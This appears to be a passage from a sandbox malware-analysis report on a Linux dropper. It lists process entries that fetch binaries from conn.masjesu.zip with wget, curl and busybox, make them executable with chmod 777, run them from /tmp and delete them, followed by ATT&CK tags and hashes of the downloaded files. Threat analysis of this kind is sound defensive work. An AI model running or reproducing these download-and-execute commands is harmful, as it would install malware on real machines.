970 | 2 | /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | ./3wDzYpBDBabysp43dimFTylVEdU479lZE3
    - Executes dropped EXE
972 | 2 | /bin/rm | rm 3wDzYpBDBabysp43dimFTylVEdU479lZE3
973 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
974 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
    - Reads runtime system information
    - Writes file to tmp directory
976 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
977 | 2 | /bin/chmod | chmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
    - File and Directory Permissions Modification
978 | 2 | /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | ./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
    - Executes dropped EXE
980 | 2 | /bin/rm | rm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
981 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
    - System Network Configuration Discovery
982 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
984 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
    - System Network Configuration Discovery
985 | 2 | /bin/chmod | chmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
    - File and Directory Permissions Modification
986 | 2 | /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | ./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
    - Executes dropped EXE
988 | 2 | /bin/rm | rm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
989 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
990 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
992 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
    - System Network Configuration Discovery
993 | 2 | /bin/chmod | chmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
    - File and Directory Permissions Modification
994 | 2 | /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | ./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
    - Executes dropped EXE
996 | 2 | /bin/rm | rm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
997 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
    - System Network Configuration Discovery
998 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
1000 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
    - System Network Configuration Discovery
1001 | 2 | /bin/chmod | chmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
    - File and Directory Permissions Modification
1002 | 2 | /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | ./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
    - Executes dropped EXE
1003 | 2 | /bin/rm | rm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
1004 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
    - System Network Configuration Discovery
1005 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
1007 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
    - System Network Configuration Discovery
1008 | 2 | /bin/chmod | chmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
    - File and Directory Permissions Modification
1009 | 2 | /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | ./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
    - Executes dropped EXE
1010 | 2 | /bin/rm | rm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
1011 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
    - System Network Configuration Discovery
1012 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
1014 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
    - System Network Configuration Discovery
1015 | 2 | /bin/chmod | chmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
    - File and Directory Permissions Modification
1016 | 2 | /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | ./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
    - Executes dropped EXE
1017 | 2 | /bin/rm | rm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
1018 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319
    - System Network Configuration Discovery
1019 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
1021 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319
1022 | 2 | /bin/chmod | chmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319
    - File and Directory Permissions Modification
1023 | 2 | /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 | ./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319
    - Executes dropped EXE
1024 | 2 | /bin/rm | rm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 176B
MD5: e1732e70f015e99d14dff1eeeaec9966
SHA1: c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256: 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512: 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Filesize: 114B
MD5: 546071c6a6aeff34580b4d1a9b35a7c3
SHA1: dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA256: 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512: 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7